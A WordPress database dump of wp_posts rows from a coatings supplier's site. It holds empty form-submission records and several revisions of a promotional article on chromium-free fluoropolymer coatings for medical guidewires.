INSERT INTO `wp_posts` VALUES (3627, 0, '2017-02-15 21:46:51', '2017-02-15 21:46:51', '', '', '', 'publish', 'closed', 'closed', '', '3627', '', '', '2017-02-15 21:46:51', '2017-02-15 21:46:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/3627/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3628, 0, '2017-02-16 06:24:47', '2017-02-16 06:24:47', '', '', '', 'publish', 'closed', 'closed', '', '3628', '', '', '2017-02-16 06:24:48', '2017-02-16 06:24:48', '', 0, 'https://www.miller-stephenson.com/nf_sub/3628/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3629, 3, '2017-02-16 14:30:34', '2017-02-16 14:30:34', '<h1><strong>Medical Guidewire Coatings:  Device manufacturers can leverage the thin-film,\r\nlubricity, and biocompatibility of Chemours/Miller-Stephensons\' fluoropolymer coatings to meet the demanding requirements of their  medical devices.</strong></h1>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer-coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection, never has our coatings been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to delivery the highest of quality products and customer service to its medical customers.\r\n\r\n&nbsp;\r\n\r\nhttps://www.youtube.com/watch?v=IOGiPlCtHWg', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-16 14:30:34', '2017-02-16 14:30:34', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3630, 3, '2017-02-16 14:35:20', '2017-02-16 14:35:20', '<h1><strong>Medical Guidewire Coatings:  Device manufacturers can leverage the thin-film, lubricity, and biocompatibility of Chemours / Miller-Stephensons\' fluoropolymer coatings to meet the demanding requirements of their  medical devices.</strong></h1>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer-coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection, never has our coatings been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to delivery the highest of quality products and customer service to its medical customers.\r\n\r\n&nbsp;\r\n\r\nhttps://www.youtube.com/watch?v=IOGiPlCtHWg', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-16 14:35:20', '2017-02-16 14:35:20', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3631, 3, '2017-02-16 15:40:31', '2017-02-16 15:40:31', '<h1><strong>Medical Guidewire Coatings:  Device manufacturers can leverage the thin-film, lubricity, and biocompatibility of Chemours / Miller-Stephenson\'s fluoropolymer coatings to meet the demanding requirements of their  medical devices.</strong></h1>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer-coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection, never has our coatings been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to delivery the highest of quality products and customer service to its medical customers.\r\n\r\n&nbsp;', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-16 15:40:31', '2017-02-16 15:40:31', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3632, 0, '2017-02-16 16:11:34', '2017-02-16 16:11:34', '', '', '', 'publish', 'closed', 'closed', '', '3632', '', '', '2017-02-16 16:11:35', '2017-02-16 16:11:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/3632/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3633, 0, '2017-02-16 16:27:13', '2017-02-16 16:27:13', '', '', '', 'publish', 'closed', 'closed', '', '3633', '', '', '2017-02-16 16:27:13', '2017-02-16 16:27:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/3633/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3634, 0, '2017-02-16 16:40:12', '2017-02-16 16:40:12', '', '', '', 'publish', 'closed', 'closed', '', '3634', '', '', '2017-02-16 16:40:12', '2017-02-16 16:40:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/3634/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3635, 461, '2017-02-16 17:11:34', '2017-02-16 17:11:34', '', '', '', 'publish', 'closed', 'closed', '', '3635', '', '', '2017-02-16 17:11:34', '2017-02-16 17:11:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/3635/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3636, 3, '2017-02-16 18:45:53', '2017-02-16 18:45:53', '<h1><strong>Medical Guidewire Coatings:  Device manufacturers can leverage the thin-film, lubricity, and biocompatibility of Chemours / Miller-Stephenson\'s fluoropolymer coatings to meet the demanding requirements of their  medical devices.</strong></h1>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer-coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection, never has our coatings been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to delivery the highest of quality products and customer service to its medical customers.\r\n\r\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-16 18:45:53', '2017-02-16 18:45:53', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3637, 3, '2017-02-16 18:47:55', '2017-02-16 18:47:55', '<h1><strong>Medical Guidewire Coatings:  Device manufacturers can leverage the thin-film, lubricity, and biocompatibility of Chemours / Miller-Stephenson\'s fluoropolymer coatings to meet the demanding requirements of their  medical devices.</strong></h1>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer-coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection, never has our coatings been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to delivery the highest of quality products and customer service to its medical customers.\r\n\r\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\r\n\r\n&nbsp;', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-16 18:47:55', '2017-02-16 18:47:55', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3638, 462, '2017-02-16 19:01:41', '2017-02-16 19:01:41', '', '', '', 'publish', 'closed', 'closed', '', '3638', '', '', '2017-02-16 19:01:41', '2017-02-16 19:01:41', '', 0, 'https://www.miller-stephenson.com/nf_sub/3638/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3639, 3, '2017-02-16 19:01:54', '2017-02-16 19:01:54', '<h1><strong>Medical Guidewire Coatings:  Device manufacturers can leverage the thin-film, lubricity, and biocompatibility of Chemours / Miller-Stephenson\'s fluoropolymer coatings to meet the demanding requirements of their  medical devices.</strong></h1>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer-coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection, never has our coatings been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to delivery the highest of quality products and customer service to its medical customers.\r\n\r\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/"><span style="text-decoration: underline;"><strong>For any further question about our Fluoropolymer Medical Coatings visit our Medical Webpage</strong></span></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-16 19:01:54', '2017-02-16 19:01:54', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3640, 0, '2017-02-16 19:27:28', '2017-02-16 19:27:28', '', '', '', 'publish', 'closed', 'closed', '', '3640', '', '', '2017-02-16 19:27:29', '2017-02-16 19:27:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/3640/', 0, 'nf_sub', '', 0); 
